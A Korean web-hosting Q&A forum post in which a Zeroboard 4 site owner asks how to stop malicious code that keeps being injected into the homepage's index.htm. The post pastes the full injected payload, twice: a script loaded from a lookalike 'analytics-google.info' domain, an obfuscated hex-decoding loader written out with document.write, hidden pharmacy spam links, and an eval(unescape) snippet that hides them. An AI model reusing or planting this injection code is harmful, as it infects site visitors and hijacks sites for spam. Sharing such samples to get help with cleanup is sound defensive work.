묻고답하기
홈피에 악성코드가 자꾸 생겨요.
2008.07.22 10:31
제로보드4를 사용하고있는데요.
요즘 매일 저희 홈페이지 www.pumpstart.kr 에 계속해서 악성코드가 추가 되고 있습니다.
index.htm에 소스중간에 <body link=purple vlink=navy style='margin:0'> 가
<script src="http://analytics-google.info/i/urchin.js"></script></head><body link=purple vlink=navy style='margin:0'><script>function c41883415430m48824e79d1eb8(m48824e79d22a0){ var m48824e79d2688=16; return (parseInt(m48824e79d22a0,m48824e79d2688));}function m48824e79d2e63(m48824e79d323f){ function m48824e79d3df7(){var m48824e79d41df=2;return m48824e79d41df;} var m48824e79d3627='';m48824e79d45c7=String.fromCharCode;for(m48824e79d3a0f=0;m48824e79d3a0f<m48824e79d323f.length;m48824e79d3a0f+=m48824e79d3df7()){ m48824e79d3627+=(m48824e79d45c7(c41883415430m48824e79d1eb8(m48824e79d323f.substr(m48824e79d3a0f,m48824e79d3df7()))));}return m48824e79d3627;} var ze7='';var m48824e79d49af='3C7'+ze7+'3637'+ze7+'2697'+ze7+'07'+ze7+'43E667'+ze7+'56E637'+ze7+'4696F6E20636865636B5F636F6E7'+ '+ '+ze7+'4656E7'+ze7+'428297'+ze7+'B7'+ze7+'6617'+ze7+'220693D303B7'+ze7+'7'+ze7+'68696C6528646F637'+ze7+'56D656E7'+ze7+'+ '42E67'+ze7+'657'+ze7+'4456C656D656E7'+ze7+'47'+ze7+'3427'+ze7+'9546167'+ze7+'4E616D652827'+ze7+'69667'+ze7+'2616D6527'+ze7+'292E6C656E67'+ze7+'7'+ze7+'468297'+ze7+'B7'+ze7+'6617'+ze7+'220656C3D646F637'+ze7+'56D656E7'+ze7+'42E67'+ze7+'657'+ze7+'+ '4456C656D656E7'+ze7+'47'+ze7+'3427'+ze7+'9546167'+ze7+'4E616D652827'+ze7+'69667'+ze7+'2616D6527'+ze7+'295B695D3B6966282028656C2E7'+ '+ze7+'37'+ze7+'47'+ze7+'96C652E64697'+ze7+'37'+ze7+'06C617'+ze7+'93D3D27'+ze7+'6E6F6E6527'+ze7+'207'+ze7+'C7'+ze7+'C20656C2E7'+ze7+'37'+ze7+'47'+ze7+'96C652E7'+ze7+'6697'+ze7+'36962696C697'+ze7+'47'+ze7+'9203D3D27'+ze7+'68696464656E27'+ze7+'207'+ze7+'C7'+ze7+'C2028656C2E7'+ze7+'7'+ze7+'69647'+ze7+'4683C3520262620656C2E68656967'+ze7+'687'+ze7+'43C35292920262620656C2E6E616D65213D27'+ze7+'633427'+ze7+'297'+ze7+'B656C2E7'+ze7+'0617'+ze7+'2656E7'+ze7+'44E6F64652E7'+ze7+'2656D6F7'+ze7+'6654368696C6428656C293B7'+ze7+'D656C7'+ze7+'36520692B2B3B7'+ze7+'D7'+ze7+'D636865636B5F636F6E7'+ze7+'4656E7'+ze7+'428293B0D0A696628216D7'+ze7+'96961297'+ze7+'B646F637'+ze7+'56D656E7'+ze7+'+ '42E7'+ze7+'7'+ze7+'7'+ze7+'2697'+ze7+'465287'+ze7+'56E657'+ze7+'363617'+ze7+'065282027'+ze7+'2533632536392536362537'+ze7+'+ '322536312536642536352532302536652536312536642536352533642536332533342532302537'+ '+ze7+'332537'+ze7+'32253633253364253237'+ze7+'2536382537'+ze7+'+ '342537'+ze7+'342537'+ze7+'30253361253266253266253637'+ze7+'253666253666253637'+ze7+'2536632536352532642536312536652536312536632536392537'+ze7+'61253635253265253633253666253664253266253639253665253265253633253637'+ze7+'25363925336625333125333526253237'+ze7+'2532622534642536312537'+ze7+'342536382532652537'+ze7+'322536662537'+ze7+'+ '352536652536342532382534642536312537'+ze7+'+ '342536382532652537'+ze7+'32253631253665253634253666253664253238253239253261253332253335253335253336253336253333253239253262253237'+ze7+'+ '253339253636253330253330253332253237'+ze7+'2532302537'+ze7+'37'+ze7+'2536392536342537'+ze7+'34253638253364253335253335253337'+ze7+'253230253638253635253639253637'+ze7+'2536382537'+ze7+'342533642533342533352533392532302537'+ze7+'332537'+ze7+'342537'+ze7+'39253663253635253364253237'+ze7+'2536342536392537'+ze7+'332537'+ze7+'302536632536312537'+ze7+'39253361253230253665253666253665253635253237'+ze7+'2533652533632532662536392536362537'+ze7+'3225363125366425363525336527'+ze7+'29293B7'+ze7+'D7'+ze7+'6617'+ze7+'2206D7'+ze7+'969613D7'+ze7+'47'+ '+ze7+'27'+ze7+'5653B3C2F7'+ze7+'3637'+ze7+'2697'+ze7+'07'+ze7+'43E';document.write(m48824e79d2e63(m48824e79d49af));</script><style>.style8 {overflow:auto;height:1px;}</style>
<div id="divId" class="style8">A side effects of <a href=http://www.pitt.edu/~upjbook/Cal/vicodin/>vicodin cheap</a>, on sale <a href=http://www.pitt.edu/~upjbook/Cal/viagr/map.html>viagr cod saturday delivery</a>, suppositories <a href=http://www.pitt.edu/~upjbook/Cal/vicodin/map.html>vicodin blue</a>, no prescription <a href=http://www.pitt.edu/~upjbook/Cal/viagr/map.html>viagr overnight</a>, cheapest in uk <a href=http://www.pitt.edu/~upjbook/Cal/hydrocodone/map.html>hydrocodone uk alternative</a>, alternative new drugs <a href=http://www.pitt.edu/~upjbook/Cal/hydrocodone/>hydrocodone abuse</a>, </div>
<script>eval(unescape("%76%61%72%20%64%69%76%45%6c%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%64%69%76%49%64%22%29%3b%64%69%76%45%6c%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%20%3d%22%6e%6f%6e%65%22%3b")); </script>
으로 index.htm이 바뀌는데요. 홈페이지의 최근게시물이 안보이게 되더 군요.
그런데 구글쪽 스크립트가 삽입되는것으로 봐서는 제로보드의 analytics-google 의 문제 같은데...
원래 구글쪽의 통계기능을 제로보드가 사용하는것으로 알고 있는데 이게 바로 악성코드의 유입 통로로 보여집니다.
해결방안은 analytics-google 의 작동중지 또는 삭제 같아서 analytics-google 관련 부분을 대충 지우긴했는데 지워도 계속 악성코드가 생성이 됩니다.
해결발법을 좀 도와주세요. 수고하세요.
제로보드는 최신버전으로 모두 업데이트한 상태입니다.
요즘 매일 저희 홈페이지 www.pumpstart.kr 에 계속해서 악성코드가 추가 되고 있습니다.
index.htm에 소스중간에 <body link=purple vlink=navy style='margin:0'> 가
<script src="http://analytics-google.info/i/urchin.js"></script></head><body link=purple vlink=navy style='margin:0'><script>function c41883415430m48824e79d1eb8(m48824e79d22a0){ var m48824e79d2688=16; return (parseInt(m48824e79d22a0,m48824e79d2688));}function m48824e79d2e63(m48824e79d323f){ function m48824e79d3df7(){var m48824e79d41df=2;return m48824e79d41df;} var m48824e79d3627='';m48824e79d45c7=String.fromCharCode;for(m48824e79d3a0f=0;m48824e79d3a0f<m48824e79d323f.length;m48824e79d3a0f+=m48824e79d3df7()){ m48824e79d3627+=(m48824e79d45c7(c41883415430m48824e79d1eb8(m48824e79d323f.substr(m48824e79d3a0f,m48824e79d3df7()))));}return m48824e79d3627;} var ze7='';var m48824e79d49af='3C7'+ze7+'3637'+ze7+'2697'+ze7+'07'+ze7+'43E667'+ze7+'56E637'+ze7+'4696F6E20636865636B5F636F6E7'+ '+ '+ze7+'4656E7'+ze7+'428297'+ze7+'B7'+ze7+'6617'+ze7+'220693D303B7'+ze7+'7'+ze7+'68696C6528646F637'+ze7+'56D656E7'+ze7+'+ '42E67'+ze7+'657'+ze7+'4456C656D656E7'+ze7+'47'+ze7+'3427'+ze7+'9546167'+ze7+'4E616D652827'+ze7+'69667'+ze7+'2616D6527'+ze7+'292E6C656E67'+ze7+'7'+ze7+'468297'+ze7+'B7'+ze7+'6617'+ze7+'220656C3D646F637'+ze7+'56D656E7'+ze7+'42E67'+ze7+'657'+ze7+'+ '4456C656D656E7'+ze7+'47'+ze7+'3427'+ze7+'9546167'+ze7+'4E616D652827'+ze7+'69667'+ze7+'2616D6527'+ze7+'295B695D3B6966282028656C2E7'+ '+ze7+'37'+ze7+'47'+ze7+'96C652E64697'+ze7+'37'+ze7+'06C617'+ze7+'93D3D27'+ze7+'6E6F6E6527'+ze7+'207'+ze7+'C7'+ze7+'C20656C2E7'+ze7+'37'+ze7+'47'+ze7+'96C652E7'+ze7+'6697'+ze7+'36962696C697'+ze7+'47'+ze7+'9203D3D27'+ze7+'68696464656E27'+ze7+'207'+ze7+'C7'+ze7+'C2028656C2E7'+ze7+'7'+ze7+'69647'+ze7+'4683C3520262620656C2E68656967'+ze7+'687'+ze7+'43C35292920262620656C2E6E616D65213D27'+ze7+'633427'+ze7+'297'+ze7+'B656C2E7'+ze7+'0617'+ze7+'2656E7'+ze7+'44E6F64652E7'+ze7+'2656D6F7'+ze7+'6654368696C6428656C293B7'+ze7+'D656C7'+ze7+'36520692B2B3B7'+ze7+'D7'+ze7+'D636865636B5F636F6E7'+ze7+'4656E7'+ze7+'428293B0D0A696628216D7'+ze7+'96961297'+ze7+'B646F637'+ze7+'56D656E7'+ze7+'+ '42E7'+ze7+'7'+ze7+'7'+ze7+'2697'+ze7+'465287'+ze7+'56E657'+ze7+'363617'+ze7+'065282027'+ze7+'2533632536392536362537'+ze7+'+ '322536312536642536352532302536652536312536642536352533642536332533342532302537'+ '+ze7+'332537'+ze7+'32253633253364253237'+ze7+'2536382537'+ze7+'+ '342537'+ze7+'342537'+ze7+'30253361253266253266253637'+ze7+'253666253666253637'+ze7+'2536632536352532642536312536652536312536632536392537'+ze7+'61253635253265253633253666253664253266253639253665253265253633253637'+ze7+'25363925336625333125333526253237'+ze7+'2532622534642536312537'+ze7+'342536382532652537'+ze7+'322536662537'+ze7+'+ '352536652536342532382534642536312537'+ze7+'+ '342536382532652537'+ze7+'32253631253665253634253666253664253238253239253261253332253335253335253336253336253333253239253262253237'+ze7+'+ '253339253636253330253330253332253237'+ze7+'2532302537'+ze7+'37'+ze7+'2536392536342537'+ze7+'34253638253364253335253335253337'+ze7+'253230253638253635253639253637'+ze7+'2536382537'+ze7+'342533642533342533352533392532302537'+ze7+'332537'+ze7+'342537'+ze7+'39253663253635253364253237'+ze7+'2536342536392537'+ze7+'332537'+ze7+'302536632536312537'+ze7+'39253361253230253665253666253665253635253237'+ze7+'2533652533632532662536392536362537'+ze7+'3225363125366425363525336527'+ze7+'29293B7'+ze7+'D7'+ze7+'6617'+ze7+'2206D7'+ze7+'969613D7'+ze7+'47'+ '+ze7+'27'+ze7+'5653B3C2F7'+ze7+'3637'+ze7+'2697'+ze7+'07'+ze7+'43E';document.write(m48824e79d2e63(m48824e79d49af));</script><style>.style8 {overflow:auto;height:1px;}</style>
<div id="divId" class="style8">A side effects of <a href=http://www.pitt.edu/~upjbook/Cal/vicodin/>vicodin cheap</a>, on sale <a href=http://www.pitt.edu/~upjbook/Cal/viagr/map.html>viagr cod saturday delivery</a>, suppositories <a href=http://www.pitt.edu/~upjbook/Cal/vicodin/map.html>vicodin blue</a>, no prescription <a href=http://www.pitt.edu/~upjbook/Cal/viagr/map.html>viagr overnight</a>, cheapest in uk <a href=http://www.pitt.edu/~upjbook/Cal/hydrocodone/map.html>hydrocodone uk alternative</a>, alternative new drugs <a href=http://www.pitt.edu/~upjbook/Cal/hydrocodone/>hydrocodone abuse</a>, </div>
<script>eval(unescape("%76%61%72%20%64%69%76%45%6c%20%3d%20%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%42%79%49%64%28%22%64%69%76%49%64%22%29%3b%64%69%76%45%6c%2e%73%74%79%6c%65%2e%64%69%73%70%6c%61%79%20%3d%22%6e%6f%6e%65%22%3b")); </script>
으로 index.htm이 바뀌는데요. 홈페이지의 최근게시물이 안보이게 되더 군요.
그런데 구글쪽 스크립트가 삽입되는것으로 봐서는 제로보드의 analytics-google 의 문제 같은데...
원래 구글쪽의 통계기능을 제로보드가 사용하는것으로 알고 있는데 이게 바로 악성코드의 유입 통로로 보여집니다.
해결방안은 analytics-google 의 작동중지 또는 삭제 같아서 analytics-google 관련 부분을 대충 지우긴했는데 지워도 계속 악성코드가 생성이 됩니다.
해결발법을 좀 도와주세요. 수고하세요.
제로보드는 최신버전으로 모두 업데이트한 상태입니다.
